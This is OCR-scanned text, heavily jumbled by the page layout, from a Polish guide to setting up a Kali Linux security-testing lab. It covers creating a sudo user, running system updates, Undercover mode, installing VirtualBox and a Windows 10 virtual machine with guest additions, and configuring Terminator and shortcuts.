Tworzenie katalogu domowego "/home/krzysiek" ... 


Kopiowanie plików z "/etc/skel" |... 


Nowe hasło : 
Zostanie utworzone 
nowe konto, które 
będzie zablokowane. 
Zostanie odblokowane 
po nadaniu hasła. Poda- 
jemy więc dwukrotnie 
nowe hasło, następnie 
uzupełniamy dane wła- 
ściciela konta, a na koniec wpisujemy T i wci- 
skamy [er]. Po wykonaniu tej procedury 
konto zostanie aktywowane i będzie można 
się na nie zalogować. 


Zanim zaczniemy korzystać z konta nowego 
użytkownika, musimy mu nadać odpowied- 
nie uprawnienia, aby w razie potrzeby móc 
korzystać z możliwości praw administratora. 


W Terminalu jako root wpisujemy i za- 
twierdzamy polecenie usermod -aG 
sudo nazwa_użytkownika 


rootQkali: + x 


:-fł usermod -aG sudo krzysiek 
:-* |] 


POZNAJ METODY HAKERÓW 


Proszę ponownie wpisać nowe hasło : 
passwd: hasło zostało zmienione 
Zmieniam informację o użytkowniku krzysiek 
Wpisz nową wartość lub wciśnij ENTER by przyjąć wartość domyślną 
Imię i nazwisko []: Krzysiek Dziedzic 
Numer pokoju []: 
Telefon do pracy []: 
Telefon domowy []: 


Czy informacja jest poprawna? [T/n] T 
zedł 


W celu sprawdzenia, czy użytkownik 
został poprawnie utworzony i ma odpo- 
wiednie uprawnienia, wpisujemy polecenia: 
su - nazwa_użytkownika w celu zalogowa- 
nia się w Terminalu, następnie sudo Is /root 
- sudo, co oznacza chęć wykonania komendy, 
której możliwość powinni mieć tylko członko- 
wie grupy sudoers (na przykład rood), oraz na 
przykład ls /root © - by wylistować foldery 
w katalogu domowym użytkownika root. Jeśli 
po wpisaniu hasła zobaczymy foldery, będzie 
to oznaczać, że nasz użytkownik ma wszystkie 
niezbędne uprawnienia. 
ft su - krzysiek 
:-$ sudo ls /root 
[sudo] hasło użytkownika krzysiek: 


Dokumenty Muzyka Obrazy Pobrane 
:-$H 
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Użytkownika, na którego konto jesteśmy za- 
logowani w Terminalu, można rozpoznać po 
początku linii użytkownikChost. 


4 E ( VSLE 

W przypadku systemu Kali Linux aktualiza- 
cje są niezwykle ważne. Oprócz podstawo- 
wych sterowników i pakietów systemowych 
aktualizowane są również bazy danych pro- 
gramów szukających zagrożeń lub rozpozna- 
jących luki w zabezpieczeniach. Dlatego też 
najlepiej nawet raz w tygodniu wykonywać 
aktualizację. W przypadku Kali Linuxa mu- 
simy przeprowadzać ją ręcznie, jednak nie 
zajmuje ona zbyt wiele czasu. 


Po uruchomieniu systemu logujemy się 
na konto naszego użytkownika 


N krzysiek 
No 


Anuluj 


Uruchamiamy Terminal, wpisujemy 

i zatwierdzamy komendę sudo apt-get 
update ©. Służy ona do wyszukiwania ak- 
tualizacji listy paczek dostępnych w naszym 
systemie. 


krzysiekkali: — x 


:-$ sudo apt-get update 
[sudo] hasło użytkownika krzysiek: 


Pobieranie:1 http://kali.koyanet.lv/kali kali-rolling InRelease [38,5 kB) 
Pobieranie:2 http://kali.koyanet.lv/kali kali-rolling/main amd64 Packages [ 


16,4 M8] 
Pobrano 16,4 MB w 11is (1497 kB/s) 
Czytanie list pakietów... Gotowe 


PE) aktualizowanych, © nowo instalowanych, © usuwanych i 44 nieaktualizowan 


ych. 
Konieczne pobranie 376 MB archiwów. 


Po tej operacji zostanie dodatkowo użyte 9433 kB miejsca na dysku. 


Kontynuować? [T/n] B 


Teraz wykonujemy komendę sudo apt- 

2 -get upgrade, to właśnie po jej wyko- 
naniu pojawi się lista pakietów do zaktu- 
alizowania 6. Zatwierdzamy aktualizację, 
wciskając klawisze [1] i (erer]. 


krzysiek 


J W trakcie aktualizowania niektórych pa- 

f kietów będziemy musieli wyrazić zgodę 

przy opcjach konfiguracyjnych - wystarczy 
wybrać Tak © i wcisnąć Ga] 


Konfiguracja pakietu 


Konfiguracja pakietu wireshark-comson 


Domyślnie w systemie Kali Linux znajdują 
się sterowniki obsługujące różnego rodzaju 
karty sieciowe. Adres IP naszego urządzenia 
możemy sprawdzić, klikając 
prawym przyciskiem myszy na 
aplet sieciowy na pasku zadań 
i wybierając opcję Informacje 
o połączeniu ©. 

Nasz adres będzie widoczny 
w polu Adres IP © i będzie nam 
potrzebny do wielu wskazówek 
w dalszej części książki. W roz- 
dziale dotyczącym ataków na sieci 
bezprzewodowe zosta- 
ną omówione szczegóły 


=E | nawiązywania połącze- 


w Sieć 


192.168.1.113 
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środowisko testowe — Kali Linux 


Tryb Kali Undercover 

Jedną z największych nowości w Kali Linuxie 
2019.4 jest specjalny tryb Kali Undercover, 
który pozwala w kilka sekund zmienić wy- 
gląd systemu, tak aby osoba, która spojrzy na 
nasz pulpit, pomyślała, że pracujemy w syste- 
mie Windows 10 ©. Jest to dobre rozwiązanie 
dla wszystkich osób pracujących w sektorze 
bezpieczeństwa i wykonujących zlecone te- 
sty. W środowisku domowym pozwoli nam 
to jedynie nie przyciągać uwagi innych do- 
mowników do naszego systemu do testów 
bezpieczeństwa. 


W celu uruchomienia tego specjalnego 
trybu otwieramy menu startowe, w pas- 
[_] ku wyszukiwania 
wpisujemy Kali 
Undercover Mode 
i klikamy na wy- 
szukaną pozycję 


LGJU undercover| 


-=_ Kali Undercover Mode 


Po chwili zostanie załadowany nowy 
motyw graficzny symulujący ten znany 
z Windows 10. 


Jeśli chcemy wrócić do domyślnego 
motywu Kali Linuxa, należy uruchomić 
Wiersz polecenia (nie Terminal, bo Kali uda- 
je Windows), wpisać kali-undercover 
i zatwierdzić. 


Plik Działania Edycja Widok Pomoc 


Powłoka 1 [x] 


C:Nhomelkrzysiek> kali-undercoverf] 


VirtualBox i wirtualne maszyny 


N a nasze środowisko testowe będą się 
składać również wirtualne maszyny 
z systemem Windows lub Linux. Dzięki temu 
wszystkie testy będziemy mogli wykonywać 
z jednej maszyny, nie ingerując w systemy 
na innych domowych urządzeniach i nie 
psując ich sobie. Dopiero gdy poznamy za- 
sady działania poszczególnych programów, 
możliwości ataku oraz obrony przed nimi, 
będziemy mogli sprawdzić, 
czy i jak atakujący mógłby 
dostać się do naszej sieci KŻ 
i naszych urządzeń. 

Tak więc wewnątrz Kali 
Linuxa musimy zainstalować VirtualBoxa, 
a w nim stworzyć odpowiednie maszyny do 
testów - na początek stworzymy maszynę 
z systemem Windows 10. Schemat tworzenia 
maszyn jest bardzo podobny, 


c -0 
OK 


Instalujemy VirtualBoxa 
Uruchamiamy Terminal, wpisujemy i za- 
twierdzamy osobno polecenia: 

wget -q https://www.virtualbox.org/ 

download/oracle_vbox_2016.asc -0- 

| sudo apt-key add - 

wget -q https://www.virtualbox.org/ 

download/oracle_vbox.asc -O- | sudo 
apt-key add - 


:-$ wget -q https://wmw.virtualbox.org/download/oracle_vbox_20 
16.asc -0- | sudo apt-key add - 
[sudo] hasło użytkownika krzysiek 


:=$ wget -q https://waw.virtualbox.org/download/oracle_vbox.as 
IEOEDZDSZI 


Po dodaniu kluczy dodajemy tepozyto- 

rium VirtualBox, z którego będziemy 
mogli zainstalować potrzebny nam program. 
Wpisujemy i zatwierdzamy komendę ©: 


:-$ echo "deb [archsamd64] http: //download.virtualbox.org/virtualbox 
/debian stretch contrib” | sudo tee /etc/apt/sources.list.d/virtualbox.list 


więc z kolejnymi nie powin- 
niśmy mieć trudności. 


deb [arch=amd64] Zz AT MEI AE | pg stretch contrib 
:-$ 
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ts 


"m 
< 


Teols 


"= OT <— I Ogólne A pośgiąś 
* więączona arwa Wa 10 


i 


Windows 10 Test Windows 10 Test 


Adwaita 


echo ”deb [arch=amd64] 
http://download. 
virtualbox.org/virtu- 
albox/debian stretch 
contrib” | sudo tee 
/etc/apt/sources. 
list.d/virtualbox.list 


Wygląd -D x 


Wygląd 


Konfiguruje wygląd środowiska graficznego 


Styt 


Adwaita (ciemny) 
Kali-Dark 
Kali-Light 


Raleigh 


17 Pomoc Zamknij 


Zamknij 


:-$ sudo apt install virtualbox virtualbox-ext-pack 

Czytanie list pakietów... Gotowe 
Budowanie drzewa zależności 
Odczyt informacji o stanie... Gotowe 
Następujące pakiety zostały zainstalowane automatycznie i nie są już więcej wyn 
ane: 

libayatana-ido3-0.4-0 libbfioi 
Aby je usunąć należy użyć "sudo apt autoremove". 
The following additional packages will be installed: 

libgsoap-2.8.91 libsdl1.2debian libvncserver1 virtualbox-dkms virtualhox-qt 
Sugerowane pakiety: 

vde2 virtualbox-guest-additions-iso 
Zostaną zainstalowane następujące NOWE pakiety: 

libgsoap-2.8.91 libsdl1.2debian libvncserveri virtualbox virtualbox-dkms 


Teraz wystarczy wpi- virtualbox-ext-pack virtualbox-qt 
an ; a 0 aktualizowanych, 7 nowo instalowanych, 0 usuwanych i 47 nieaktualizowanych. 
sać i zatwierdzić ko- Konieczne pobranie 50,4 MB archiwów. 
mendy: Po tej operacji zostanie dodatkowo użyte 181 MB miejsca na dysku. 
Kontynuować? [T/n] H 
sudo apt-get update 
oraz virtualbox-ext-pack — 
sudo apt install virtualbox Musimy wpisać T i nacisnąć (crier]. 
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środowisko testowe — Kali Linux 


Następnie musimy zatwierdzić kilka wiele innych udogodnień. Bardzo ułatwi to 
umów licencyjnych i wyrazić zgodę na _ nam testowanie zabezpieczeń w dalszych 


instalację 


rozdziałach książki. 


Pobieramy obraz systemu 


„ 
Do you accept the terms of the VirtualBox PUEL license? Windows 10 


W celu utworzenia maszyny wirtualnej 
z konkretnym systemem będziemy musieli 
mieć jego płytę instalacyjną lub jej obraz ISO. 


W przypadku systemu Windows 10 możemy 
Po zakończeniu instalacji będziemy mog- _ pobrać ją bezpośrednio ze strony Microsoftu. 


li znaleźć program VirtualBox © w menu 


Siem O] 


virtualb| 


49 VirtualBox 


startowym © lub uruchomić go, wpisując 


Wchodzimy na stronę: 
https://www.microsoft.com/pl-pl/ 


software-download/windows10ISO 


Wybieramy wersję systemu i klikamy na 
Potwierdź €. 


w Terminalu polecenie virtualbox. 


Wybierz wersję 


Poniższe wersje systemu Windows 10 dotyczą zarówno Windows 10 Hd 


Windows 10 


www.virtualbox orq 


Dodatkowo zainstalowaliśmy od razu spe- 
cjalne rozszerzenie VirtualBox Extension 
Pack, które pozwala na obsługę portów USB 
2.0, USB 3.0, przenoszenie plików pomiędzy 
maszyną wirtualną a hostem i udostępnia 


Wybieramy język Polski 
potwierdzamy. 


i ponownie 


4 Zostaną wygenerowane dwa linki do po- 


brania wersji 64-bit oraz 32-bit. Wszyst- 


kie testy w książce będą wykonywane na 
wersjach 64-bitowych, więc ten obraz 
pobieramy - jedynie część z nich będzie 
również działać na maszynach 32-bitowych. 
Obecnie maszyn 64-bitowych jest zdecydo- 
wanie więcej, dlatego też właśnie na nich 
się skupimy. 


Wybór języka produktu 
Podczas instalowania systemu Windows trzeba wybrać ten sam język. Aby sprawdzić, jaki język jest 


obecnie używany, przejdź do pozycji Czas i język w ustawieniach komputera lub do pozycji Region 
Panelu sterowania. 


Polski v 


Windows 10 P« 


64-bit Pobierz 


32-bit Pobierz 
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Tworzymy wirtualną maszynę 


o różnego rodzaju testów będą nam Następnie klikamy na nowo utworzoną 
potrzebne różne maszyny, na przykład maszynę i na górnym pasku na Ustawie- 
z systemem Windows 10, 7 czy też XP. Proces ia ©. 
ich tworzenia jest bardzo podobny, dlatego 
też prześledzimy krok po kroku, jak wygląda 
ta procedura dla systemu Windows 10. 


Potem przechodzimy do zakładki Pa- 
mięć, w środkowej części okna zazna- 
czamy napęd CD/DVD (to znaczy klikamy na 
ikonę z płytą CD), a po prawej stronie klika- 
my na ikonę z płytą CD i strzałką. Wybiera- 
my z menu dialogowego opcję Choose a disk 


Uruchamiamy program Virtual- 
Box i klikamy na Nowa 


Pllk Maszyna Pomoc 


Następnie klikamy na Tryb Eks- | ** Nowa U 


perta ©: WindowsiOTest c=  ** sólne 
© wyłączona = Nazwa Windows 10 
Tryb eksperta SRowoGk 6 


Teraz podajemy nazwę tworzo- 
nej maszyny wirtualnej, wska- 


Windows 10 Test 


zujemy miejsce zapisu danych, wy- iS 

bieramy wersję systemu, podajemy RAM 40 

. zz . . Boot Order: FI , Dysk twardy 

ilość pamięci RAM © (rekomendo- Akceleracja: VT-xJAMD-V, żone stronicowanie, Parawirtualizacja 


Hyper-V 


wane 4 GB w przypadku Windows = 
10 64 bid i klikamy na Utwórz. Pamięć wideo 


Utwórz wirtualną maszynę 


Nazwa i system operacyjny 


Name: Windows 10 Test 
Machine Folder: [home/krzysiek/VirtualBox VMs 
Typ: Microsoft Windows 


Wersja: Windows 10 (64-bit) 


Rozmiar pamięci 


8192 MB 


Dysk twardy 


Nie dodawaj wirtualnego dysku twardego 


* Stwórz wirtualny dysk twardy 


Użyj istniejącego pliku wirtualnego dysku twardego 


Tryb przewodnika Anuluj 
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I) ogólne 


Pamięć 
aj System Storage Devices 
M Ekran © Kontroler: SATA 
[EJ Pamięć | | ©) Windows 10 Test.vdi 
(p Dżwięk 
m) Sieć 
f> Porty szeregowe 
fo USB 
[7] udostępniane foldery 


Parametry 


Informacja 


Napęd optyczny: Port SATA 1 - h 


Live CD/DVD _ (A Choose/Create a Virtual Optical 


Hot-pluggabie 
Napęd gospodarza VBOX CD-R 
Obraz 


4,95 GB G Usuń dysk z wirtualnego napędu 
[homefkrzysiek/Pobrane/Win10_1909_Polish_x64.1... 


Typ: Win10_1909._Polish_x64.is0 
Rozmiar: 
Ścieżka: 


Podłączone do: 


file © i wskazujemy obraz ISO z płytą insta- 
lacyjną systemu z naszego dysku (jeśli mamy 
płytę fizyczną, musimy wcześniej utworzyć 
z niej plik ISO, na przykład za pomocą pro- 
gramu WinCDEmu NICH). Klikamy na OK. 
Teraz możemy uruchomić naszą nową ma- 
szynę, zaznaczając ją i klikając na Uruchom 


na górnym pasku. 
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Ww 


um 
ma VVIC 


Na koniec należy zainstalować system, 

postępując zgodnie z instrukcjami kre- 
atora instalacji ©. Po zainstalowaniu Win- 
dows 10 © będziemy mogli wykorzystać go 
w testach bezpieczeństwa. 


Dodatki gościa wewnątrz maszyn 


wirtualnych 


R ozszerzenie umożliwiające obsługę 
portów USB 2.0 i 3.0 oraz przesyłanie 
plików pomiędzy naszym hostem a wybra- 
ną maszyną wirtualną zainstalowaliśmy od 
razu przy instalacji programu VirtualBox. 
Zeby jednak móc z niego korzystać, musimy 
je zainstalować również w każdej maszynie 
wirtualnej, w której będziemy chcieli mieć 
dostęp do tych dodatkowych możliwości. 


Instalujemy dodatki gościa 


Uruchamiamy maszynę wirtualną, w któ- 
rej zainstalowaliśmy system operacyjny. 
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| Urządzenia Pomoc 
(9 Napędy optyczne , 
(B Audio > 
EP Sieć > 
3) © USB > 
| © Kamerki Internetowe > 
|7 Udostępniane foldery > 
| £) Wspólny schowek > 
Ey Przeciąganie i upuszczanie U 
% Zamontuj obraz płyty z dodatkami gościa... 


Następnie klikamy na górnym pasku na 
Urządzenia i na Zamontuj obraz płyty 
z dodatkami gościa 


adam1i3zajacEgmail1.com 


Pobieramy obraz dysku z dodatkami, kli- 
kając na Pobierz 


VirtualBox - 


Pytanie 


Następnie uruchamiamy instalator do- 
datku, klikając dwukrotnie na VBoxWin- 
dowsAdditions.exe 


5 Obiety 10 
Nie mogę znależć pliku obrazu 5 Owrazy 
dyskuDodatki gościa VirtualBox Kirówa 
EB Pulpa 
Czy chcesz pobrać ten plik dysku HB deo 
z Internetu? m Dysk lokalny (€:) 
© Sacja dysków CD (I 


© VBoxWindowstdóboni ee 
4% VRorwindowtidótoniamdói se 
© VorWindowskddtonibó.ere 


VBcxDarwnkddtion:. pg 
VBexDarwmigótozniUninstalitool 
Vos linańddzionezun 

Vic $cłarisńckdzion: pią 

1604 Aplikacje 


Anuluj 


Pobierz 


W kolejnym oknie ponownie klikamy 
na Pobierz w celu potwierdzenia pobie- 
rania 


Ż, Szukanie Dodatki gościa VirtualBox... 


100% 


- Pytanie 


Czy jesteś pewny(a), że chcesz 
pobrać plik obrazu dysku Dodatki 
gościa VirtualBox z https:// 
download.virtualbox.org/ 


virtualbox/6.1.0/ 
VBoxGuestAdditions_6.1.0.iso 


(rozmiar 59 516 928 bajtów)? 


Anuluj Pobierz 


Po zakończeniu pobierania należy dodać 
dysk do wirtualnego napędu - wystarczy 
kliknąć na Zamontuj 


VirtualBox - Pytanie 

Plik obrazu dyskuDodatki gościa 
VirtualBox został pomyślnie pobrany z 
https://download.virtualbox.org/virtualbox/ 
6.1.0/VBoxGuestAdditions_6.1.0.is0 i 
zapisany lokalnie jako /nome/ 
krzysiek/.config/VirtualBox/ 
VBoxGuestAdditions_6.1.0.iso. 


Czy chcesz zarejestrować ten plik dysku i 
zamontować go w wirtualnym dysku 
optycznym? 


Anuluj Zamontuj 


Uruchamiamy Eksplorator plików w ma- 

szynie wirtualnej, przechodzimy do 
widoku urządzeń i dysków i dwukrotnie 
klikamy na stację dysków z zamontowanym 
dodatkiem Guest Additions 


Po potwierdzeniu uprawnień admini- 
stratora zostanie uruchomiony kreator 


instalacji R l 
Oracle VM VirtualBox Guest Addrtrons 6.1.0 Setup - X 


Welcome to Oracle VM VirtualBox 
Guest Additions 6.1.0 Setup 


Setup wd gude you through the nstałlston of Orade VM 
wrtunłon Guest addtons 6.1.0. 


Ita recommended that you case all other appkcatana 
before startnęj Setup. This wl make it possżnie to update 
relevant system fles without having to reboot your 
computer. 


Chck Next to coninue. 


Camel 


W trakcie instalacji koniecznie wyrażamy 
zgodę na instalację wszystkich dodatko- 
wych sterowników 


Czy chcesz teraz zainstalować to oprogramowanie urządzenia? 


Nazwa: Oracle Corporatian Urządzenia systemowe 
Wydawca: Oracle Corporation 


El Zawsze ufaj oprogramowamnu z „Oracle Zainstaluj 


Corporation" 


© Nalezy instalować oprogramowanie sterowników pochodzące wyłącznie od zaufanych 
wydawców. Jak ckreśkć, które oprogramowanie sierow 


nska można bezpiecznie zainstalować? 


Po zakończonej instalacji dodatku 
musimy ponownie uruchomić ma- 
, aby móc korzystać z no- 


1 


szynę wirtualną 
wych funkcji. 


5 Oracle VM VirtualBox Guest Addńtions 6.1.0 Setup 


Complietmg Oracle VM VirtualBox 
Guest Addilions 6.1.0 Selup 


Your computer must be restarted in order to complete the 
nstaation of Orade VM VrtualBox Guest Addtons 6. 1.0. Do 


Urządzenia i dyski (2) 


Dysk lokalny (C:) 
35 cu NE 


= 47 GB wolnych z 19,4 GB 


Stacja dysków CD (D:) Virtualiox 
Guest Additions 


Inych z 56 


you wani to rebcot now? 


©) Reboot now 


O want to manuały reboot later 
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Korzystamy z dodatkowych funkcji 


p o zainstalowaniu dodatków gościa mu- 
simy je aktywować, jeśli chcemy z nich 
skorzystać. 


Po ponownym uruchomieniu maszyny 

wirtualnej i załadowaniu się systemu 
operacyjnego klikamy na górnym pasku na 
Urządzenia. 


W menu dialogowym znajdziemy opcje: 
Udostępniane foldery, Wspólny scho- 
wek, Przeciąganie i upuszczanie ©. To 


ę 
w kolejnych rozdziałach książki. 


Urządzenia Pomoc 
© Napędy optyczne , 
(8 Audio D 
9 Sieć , 


© USB , 


© Kamerki internetowe 
© Udostępniane foldery , 
UJ Wspólny schowek r 
B Przeciąganie i upuszczanie > 


6 Zamontuj obraz płyty z dodatkami gościa... 


Najeżdżamy na jedną znich, na przykład 
i wybieramy opcję Bidirectional 


0) wspólny schowek 


a 


pz 


Przeciąganie I upuszczanie Q Disabled 


Zamontuj obraz płyty z dodatkami gościa Q Gospodarz do gościa 
Q Gość do gospodarza 


©) Bidirectiol 21 


Ta opcja pozwoli nam bez problemu prze- 
ciągać pliki z hosta Kali Linuxa do maszyny 
wirtualnej. Takie szybkie kopiowanie zao- 
szczędzi nam później mnóstwo czasu. 


Funkcja Udostępniane foldery © pozwala 
na korzystanie z folderów hosta w maszy- 
nie wirtualnej, co umożliwia uruchamianie 


[Z Kamerki internetowe r 
JH Udostępniane foldery 
E| wspólny schowek 0 
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, Fe Ustawienia udostępnianych folderóy:.. 


różnego rodzaju plików bez kopiowania. Na- 
leży ją jednak skonfigurować do poprawnej 
pracy. Wybieramy ją z menu dialogowego. 


Dodajemy nowy folder, klikając na ikonę 
z plusem © po prawej stronie. 


Udostępniane foldery 
Współdzielone foldery 


Nazwa Ścieżka Dostęp Auto Mount At 
BATE Rio RÓG AKR) 
Foldery tymczasowe 


Podajemy, który folder z naszego hosta 

ma być udostępniany, zaznaczamy opcję 
Automatyczne montowanie i Ustaw na sta- 
łe, wskazujemy punkt montowania - X: 
(to oznacza, że nasz folder zostanie zmapo- 
wany jako dysk X) i klikamy na OK. 

Dadaj udostępniany folder x 
Ścieżka do folderu: B/home/...ysiek/Pobrane = 
Nazwa folderu: Pobrane 

_ Tytko do odczytu 


w Automatyczne montowanie 


Mount point: X: 


w Ustaw na stałe 


Anuluj OK 


Teraz po uruchomienia Eksploratora pli- 
ków będziemy mogli uzyskać dostęp do 
zasobu, którego ścieżkę podaliśmy 


widok Narzędzia zi 


= || = | Pobrane (iVBox%w1) 06) 


Narzędzia główne Udostępnianie 


te Tenk.. > Pobrane Q(WRox$.. > v © 
% Szybki dostęp 
Piski do testowania 
© OneDrve System Volume information 


apache-user=enum-2.0.brt 
Win10_1905_Polish_xGż.iso 


FA Ten komputer 
Dokumenty 

„b Muryka 

78 Obiekty 3D 

©) Obrazy 

4 Pobrane 

© Pulpit 

HB wideo 

m Dysk lokalny (C:) 

© Stacja dysków CD (D-) Vsrt 

== Pobrane (WBoxSwr) QC) 
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Nazwa i system ope 


Name. 

Machine Folder 
Typ: 

Wersja: | w 


Rozmiar pamięci 


AA) 


Dysk twardy 


Nie dodawaj 


€ MSI cLiCH sSIos 5 
MIE RE JgecdkokpozkdkA 3.60 GHz 
3000 MHz 


GAME BOOST 
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Motherboard se 


pysk twardy scan sa) eż , 


Instalujemy ulepszony Terminal 


tandardowy emulator Terminalu - QTer- 

minal, który jest dostępny w systemie 
Kali Linux - nie ma wielu zaawansowanych 
funkcji, które są przydatne w trakcie wyko- 
nywania testów. Dlatego też warto zainstalo- 
wać Terminator, który ma znacznie większe 
możliwości. 


Uruchamiamy emulator Terminalu i wpi- 
sujemy komendę sudo apt-get install 
terminator 


:-$ sudo apt-get install terminator 
[sudo] hasło użytkownika krzysiek: 


Po wpisaniu naszego 

hasła wciskamy kla- 
wisz [1], by zatwierdzić 
instalację 


Zainstalowany program znajdziemy 
w menu startowym, możemy go umie- 


ścić na panelu skrótów ę. 


JLB_L.1 


termi| 


[- |Terminator 
ET Terminal Xfce 


Zanim zaczniemy w pełni korzystać z Ter- 
minatora, warto go skonfigurować do pracy. 


HJK CCC BCE] 


KKŻ 
Konieczne pobranie 548 kB archiwów. 
Po tej operacji zostanie dodatkowo użyte 3274 kB miejsca na dysku. 


Kontynuować? [T/n] Ti] 
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podzakładki Przewijanie 


i zaznaczamy opcję Nie- 
skończone przewijanie 6. Jest to jedna z naj- 
bardziej przydatnych opcji, która umożliwia 
przeglądanie w całości wszystkich poleceń 
w wybranym oknie Terminatora. 


Dodatkowo, jeśli chcemy zmienić motyw 

graficzny okna Terminatora, możemy 
przejść do zakładki Kolory © i wybrać włas- 
ne ustawienia. 


Ogólne Profile Układy _ Skrótykiawiszowe Wtyczki — O programie 
Profil Ogólne Polecenie Kałory Tło Przewijanie Zgodność 
[em 
Nowy profil Położenie paska przewijania: | Po prawej stronie w 
Przewijanie przy pojawieniu się nowych danych 
Przewijanie przy naciśnięciu klawisza 
(Z Nieskończone przewijanie 
Kopiu 
e 3 A Ogólne Polecenie Kolory Tło Przewijanie _ Zgodność 
wklej Uruchamiamy Termi- — 
Im Podziel w poziomie nator, klikamy pra- WE 
A kiem MYSZ Kolory z motywu systemowego 
II Pozdzielw pionie wym przycis ż y y Wbudowane schematy: Własne - 
Otwórz zakładkę na środek okna i wybiera- m 
P Kolor tekstu 
Zamknij my Preferencje 
Kolor tka GS) 
rminal Przechodzimy do | | *"e 
Pokaż pasek przewijania zakładki Profile, do Wtdowaneschematy: WIEC ka 


Paleta kolorów: 


Dodajemy skrót klawiaturowy 


W systemie Kali Linux możemy tworzyć 
globalne skróty klawiaturowe, które mogą 


znacznie zwiększyć komfort pracy i przyspie- 
szyć wiele częstych zadań. Jednym z najczę- 
ściej uruchamianych przez nas programów 


będzie zdecydowanie Terminator - warto 
więc utworzyć dla niego skrót klawiaturowy. 


JAK WYŁĄCZYĆ AUTOMATYCZNE BLOKOWANIE EKRANU 


Domyślnie w systemie Kali Linux system 
blokowany jest po 10 minutach bezczynno- 
ści. Często więc, gdy na chwilę odejdziemy 
od komputera, po powrocie musimy się 
ponownie logować. 


By to zmienić, otwieramy menu GEJE, 
klikamy na NSEWICIE), a następnie na 


Zasilanie 


Konfiguruje ustawienia zasilania 
Ogólne System fkron Bezpieczeństwo — Urządzenia 
Light Locker 


Automatycznie blokuj sesję: 


Opóźnienie błokowania po wygaszaczu ekranu dla 


© Zablokowane ekranu po przejściu w stan wstrzymania 
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Gdy wygaszacz ekranu jest wyłączony 


EB Ulubione ili Menedżer ustawień 


©) Ostatnioużywane Edytor typów MIME 
g Wszystkie jj Sarorustawceń 
[li Ustawienia | ZU 


6 Usuat Applications = Klawiatura 


©. 01 - Information Gathering | OZ 


4ę 02 - Vulnerability Analysis "=— Menedżer plików 


03 - Web Application Anatysis 


Z do zakładki 
i przy polu 
Automatycznie blokuj sesję JEZ 
ramy opcję [IEŻN) . Wychodzimy 


z okna, klikając na ZNA]. 


Od teraz po 10 minutach bez- 
czynności będzie aktywował się 
tylko wygaszacz ekranu. 


Gdy wygaszacz ekranu jest aktywowany 
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W menu starto- 
wym wpisujemy 
frazę Klawiatura 
i uruchamiamy znale- 
ziony aplet 


Przechodzimy do 
zakładki Skróty klawiaturowe i klikamy 
u dołu na Dodaj 


Wpisujemy w polu tekstowym komendę 
- terminator © i klikamy na OK. 


Dodawanie skrótu 


Proszę wprowadzić polecenie wykonywane za pomocą skrótu. 


Command: | terminatoń 


Powiadamianie o uruchomieniu 


Anuluj 


Potem wciskamy skrót klawiaturowy ©, 
który będzie aktywował naszą komendę, 
na przykład (dx]+[T]. 


Skrót klawiszowy 


Proszę wcisnąć kombin 


użącą do wywołania polecenia „terminator” 


Skrót: Nie wciśnięto żadnego 


Od tej pory zawsze, gdy wciśniemy skon- 

figurowany skrót, zostanie uruchomiony 
program Terminator i będziemy mogli z nie- 
go od razu korzystać. 


Edytujemy menu kontekstowe 
w Menedżerze plików Thunar 
Dużą zaletą 


Menedżera Plik Fdycja Widok Przejdź Pomoc 
plików Thu- <| w ul 
nar jest moŻli- , 

wość dodawa- jo 


nia własnych | — 
akcji do menu | —_ 
kontekstowe- | gą 
go. Dzięki te- 
mu możemy 
dodawać do | w 
niego nowo 
zainstalowane 


Zaznacz wszystko 


Zaznacz według wzoru 


Odwróć zaznaczenie 


ili Preferencje... 


Klawiatura -u x 


Klawiatura 


Konfiguruje ustawienia klawiatury oraz skróty klawiszowe programów 


Ct 


Skróty klawiszowe 


Uruchamianie programów: 


xfce4-display-settings --minimal 


Ekran 
xfce4-display-settings --minimal Super+P 
xfce4-popup-whiskermenu Ctrl+Esc 
xfce4 - popup-whiskermenu - -pointer Alt+F1 
xfce4-screenshooter Print 


xfce4 -screenshooter - -fullscreen --cliphoard Ctrl+Print 


xfce4 -screenshooter - region ShiftePrint 
xfced -screenshooter - -reglon --clipboard Shift+CtrlePrint 
xfce4-screenshooter - -window Alt+Print 


xfce4-screenshooter --window --clipboard  Ctrl+Alt+Print 


xflock4 Super+l 
xflock4 Cirl+Alt+Delete 
xttock4 Ctri+Alt+L 


Dodaj Edycja Usuń Przywróć domyślne 


11 Pomoc Zamknij 


programy i usuwać stare, które nie są nam 
już potrzebne. 


Otwieramy Menedżer plików Thunar, 
klikamy na górnym pasku na Edycja, 
a potem na Czynności 


Klikamy na znak plusa 
w celu dodania nowej 
czynności. 


Uzupełniamy formularz nowej czynności, 

nie zapominając o ikonie. Jako polecenie 
wpisujemy nazwę aplikacji, która ma zostać 
uruchomiona, w naszym przypadku - ter- 
minator 


Edycja czynności n x 
Nazwa Otwórz w Terminatorze 
Opis: Otwiera Terminator w biężącej lokaliz 
Polecenie: terminator 


Skrót klawiszowy: Brak 


(O Powiadamianie o uruchamianiu 


Ikona 
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środowisko testowe — Kali Linux 


Edycja czynności D x 
Przechodzimy do zakładki Wyświetlanie, ogć Wyświetlanie 
zaznaczamy opcję Katalogi © i klikamy 
na OK. Wzór pliku: | 
lypy elementów 
Teraz, gdy w Menedżerze plików klik- katalogi Pliki tekstowe 
niemy na wolną przestrzeń prawym Pliki dźwiękowe Pliki wideo 
przyciskiem Pliki obrazów Inne pliki 


myszy, z menu 
kontekstowe- _ mogli wybrać czynność, którą sami doda- 
go będziemy liśmy 


Izy) Utwórz katalog 


liki do testowanie Utwórz z szablonu... , 


Instalacja zewnętrznych programów 


trakcie korzystania z systemu Kali Li- 

nux wielokrotnie będziemy mieli po- 
trzebę instalacji programów, które nie znaj- 
dują się w oficjalnych repozytoriach, a tym Wybierz pakiet do pobrania: 
samym metoda instalacji poprzez polecenie 
sudo apt-get install nie przyniesie oczeki- 
wanych rezultatów. W przypadku takich pro- 
gramów musimy sami ręcznie pobrać paczkę 
instalacyjną i przeprowadzić instalację krok 
po kroku. Zobaczmy, jak wygląda ten proces, 
na przykładzie przeglądarki Google Chrome. 


Pobierz Chrome na Linuksa L 


DebianUbuntu/FedorajcpenSUSE 


Q64-bitowy „deb (dla dys 
6: ito! rpm (dla 


Google Chrome — Warunki korzystania z usługi | 


Niniejsze Warunki korzystania z usług korzystania z kodu 


vogle Chrome jest dostępny 


ywalnego Google Chrome. 


bezpłatnie na mocy licencji oprogramowania ty 


wersja do druku 


Otwieramy do- 
myślną przeglą- 
darkę internetową - 
Firefox ESR 


dodanie repozytorium Google 


Zaakceptuj i zainstaluj 


Pobieramy i zapisujemy paczkę na na- 
